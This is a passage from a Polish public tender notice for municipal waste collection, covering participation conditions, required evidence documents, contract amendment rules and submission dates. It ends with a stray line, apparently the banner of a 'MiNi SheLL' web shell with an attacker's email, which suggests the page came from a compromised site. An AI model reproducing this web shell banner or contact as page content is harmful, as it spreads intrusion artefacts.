zawodowej:<br/>Zamawiający uzna warunek udziału za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 3 lat, wykonał, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w<br/>sposób należyty, co najmniej 2 zadania polegające na odbiorze i transporcie odpadów<br/>komunalnych z nieruchomości zamieszkałych i niezamieszkałych w sposób ciągły przez co<br/>najmniej 12 miesięcy każde zadanie, o łącznej masie co najmniej 600 Mg każda,<br/>b) wyposażenie bazy magazynowo – transportowej, wyposażenie pojazdów, utrzymanie<br/>odpowiedniego stanu technicznego i sanitarnego pojazdów i urządzeń powinno spełniać<br/>wymagania zawarte w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz.122),<br/>c) posiada:<br/>- co najmniej dwóch pojazdów specjalnych bezpylnych (śmieciarka) z funkcją kompaktującą<br/>przystosowanych do odbierania zmieszanych odpadów komunalnych zbieranych w pojemnikach<br/>60 l -1100 l, w tym jeden pojazd – śmieciarka na podwoziu dwuosiowym o dopuszczalnej masie<br/>całkowitej nie większej niż 4600 kg o nacisku nieprzekraczającym 3,5 t na oś,<br/>- co najmniej dwóch pojazdów przystosowanych do odbierania selektywnie zebranych odpadów<br/>komunalnych,<br/>- co najmniej jednego pojazdu do odbierania odpadów bez funkcji kompaktującej.<br/>2. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej<br/>lub finansowej podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków<br/>prawnych.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu<br/>albo odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby<br/>do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>4. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają<br/>na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa<br/>w art. 112 ust. 2 pkt 3 i 4, oraz bada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>5. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda,<br/>aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału<br/>w postępowaniu.<br/>6. Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie<br/>do udziału w postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania wniosków<br/>o dopuszczenie do udziału w postępowaniu albo ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie spełnienia warunków<br/>udziału:<br/>2. Zamawiający żąda w celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu dotyczących:<br/>1) sytuacji ekonomicznej lub finansowe:<br/>a) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż<br/>300.000,00 zł;<br/>2) zdolności technicznej lub zawodowej:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy – załącznik nr 4a do SWZ;<br/>b) wykaz sprzętu transportowego – załącznik nr 4b do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć oświadczenia o niepodleganiu wykluczeniu– załączniki nr 2 i<br/>załącznik nr 3 – oświadzczenie o spełnieniu warunków udziału do SWZ. Oświadczenia te<br/>stanowią dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący podmiotowe środki<br/>dowodowe, o ile wymagane będą przez Zamawiającego.<br/>4. Oświadczenia składane są pod rygorem nieważności w formie elektronicznej<br/>lub w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w ust. 3 składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w ust. 3, także<br/>oświadczenia dotyczące podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału<br/>w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>7. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>8. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 7, potwierdza,<br/>że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane<br/>zdolności dotyczą.<br/>9. Zobowiązanie musi być złożone w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym osoby upoważnionej do reprezentowania podmiotu udostępniającego<br/>zasoby zgodnie z zasadami reprezentacji określonymi w dokumencie rejestrowym właściwym<br/>dla formy organizacyjnej lub innym dokumencie.<br/>10. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane<br/>jest ustanowienie Pełnomocnika do reprezentowania ich w postępowaniu i/lub zawarcia umowy<br/>w sprawie zamówienia publicznego.<br/>11. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>1) postępowania o zamówienie publiczne, którego dotyczy,<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy, z określeniem siedziby,<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>12. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji<br/>z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w stosunku do treści oferty Wykonawcy, które nie są zmianami istotnymi w rozumieniu art. 454 ust. 2 ustawy Prawo zamówień publicznych.<br/>2.	Zamawiający dopuszcza możliwość dokonania zmiany istotnych postanowień umowy w stosunku do treści oferty Wykonawcy w następujących przypadkach:<br/>1)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, noszących znamiona siły wyższej – uprawniających Strony do zmiany umowy w zakresie wymaganym do jej prawidłowej realizacji;<br/>2)	wystąpienia obiektywnych czynników uniemożliwiających realizację umowy zgodnie z pierwotnym terminem – uprawniających Strony do zmiany terminu wykonania umowy;<br/>3)	wystąpienia (ujawnienia) w trakcie realizacji umowy okoliczności uzasadniających dokonanie uściśleń/uzupełnień/zmian postanowień umownych korzystnych dla Zamawiającego; <br/>w powyższej sytuacji wynagrodzenie Wykonawcy nie zostanie zwiększone,<br/>4)	zmiany stawki podatku od towarów i usług oraz podatku akcyzowego – uprawniającej Strony Umowy do zmiany wysokości wynagrodzenia Wykonawcy, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>5)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę – uprawniającej Strony umowy do zmiany wysokości wynagrodzenia Wykonawcy, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>6)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne – uprawniającej Strony Umowy do zmiany wysokości wynagrodzenia Wykonawcy, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>7)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342 z późn. zm.) – uprawniającej Strony Umowy do zmiany wysokości wynagrodzenia Wykonawcy, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>Szczegóły zmian umowy znajdują się we wzorze umowy w paragrafie 15. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-25 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Identyfikator miniPortalu 2486d3a9-00e0-48b9-ab33-d9c6e943ffce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-25 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena

Creat By MiNi SheLL
Email: jattceo@gmail.com